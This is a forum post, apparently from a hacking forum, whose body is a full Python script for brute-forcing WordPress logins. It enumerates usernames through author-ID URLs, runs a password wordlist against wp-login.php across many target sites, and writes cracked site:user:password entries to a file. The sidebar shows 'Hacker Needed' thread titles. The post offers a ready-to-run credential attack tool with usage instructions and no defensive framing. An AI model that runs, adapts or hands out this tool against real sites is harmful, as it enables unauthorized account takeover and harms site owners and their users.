Admin- Admin
- Posts : 474
Reputation : 8
Join date : 2014-12-10
Age : 32
Location : Pakistan
by Admin Mon Jun 06, 2016 11:23 am
- Code:
#!/usr/bin/python # >>>>>>>>> bismallah <<<<<<<<<< ''' this a wordpress bruter the special thing about it that it grabs user and brute force it ''' # v1.0 first release import sys , re , urllib2 , urllib , cookielib , os from platform import system if system() == 'Linux': os.system('clear') if system() == 'Windows': os.system('cls') logo = ''' _ ______ __ __ | | / / __ \/ /_ _______ __/ /____ | ----| Wordpress Bruter |---- | | /| / / /_/ / __ \/ ___/ / / / __/ _ \ | Author : | |/ |/ / ____/ /_/ / / / /_/ / /_/ __/ | FB : |__/|__/_/ /_.___/_/ \__,_/\__/\___/ | Blog : ''' print(logo) # this function is to enumerate user def user(site , passlist): userlist = list() i = 1 # you can edit to whatever number of users you want to enumerate while( i <= 5 ) : url = site + '?author=%i' % i try: data = urllib2.urlopen(url).read() # cleaning the sh*t re1 = re.findall("<title>(.*?)</title>" , data) user = re.search("(.*?) |" , re1[0]).group(1) userlist.append(user) except: pass i += 1 wpbrute(site , userlist, passlist) return site def wpbrute(site , userlist , passlist): for user in userlist: # if enumeration returns no user if user == "" : userlist[0] = "admin" del userlist[1:] for user in userlist : for password in passlist: try: print str(site) + ':' + user + ':' + password # found the answer on stackoverflow cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) login_data = urllib.urlencode({'log' : user, 'pwd' : password}) opener.open(str(site) + 'wp-login.php', login_data) resp = opener.open(str(site)+'wp-admin') final = resp.read() if '<li id="wp-admin-bar-logout">' in final: print "\n\t[*] Cracked : " + str(site) + ':' + user + ':' + password + '\n' with open('wpcracked.txt' , 'a') as myfile: myfile.write('~~ Cracked ~~ ' + str(site) + ':' + user + ':' + password + '\n') break except: pass try: siteslist = list() passlist = list() wpfile = sys.argv[1] wordlist = sys.argv[2] # opening sites file sites = open(wpfile).readlines() # opening password files passes = open(wordlist).readlines() # passes to list for pass1 in passes: pass1 = pass1.rstrip() passlist.append(pass1) # sites to list for site in sites: site = site.rstrip() if 'http://' not in site: site = 'http://' + site if '/' != site[-1]: site = site + '/' user(site , passlist) except IndexError: print "[*] Usage : python "+sys.argv[0]+" wp.txt wordlist.txt"
Sat Apr 29, 2017 10:50 am by ubedullah
» Group hackers
Sat Apr 15, 2017 2:37 pm by Group Hackers
» Hacker Needed
Sat Apr 15, 2017 3:57 am by Group Hackers
» Hacker Needed
Sat Apr 15, 2017 1:45 am by Group Hackers
» Hacker Needed
Thu Apr 13, 2017 11:10 pm by Group Hackers
» Hacker Needed
Tue Apr 11, 2017 2:07 pm by Group Hackers
» Hacker Needed
Tue Apr 11, 2017 2:21 am by Group Hackers
» Hacker Needed
Tue Apr 11, 2017 2:06 am by Group Hackers
» Hacker Needed
Tue Apr 11, 2017 1:35 am by Group Hackers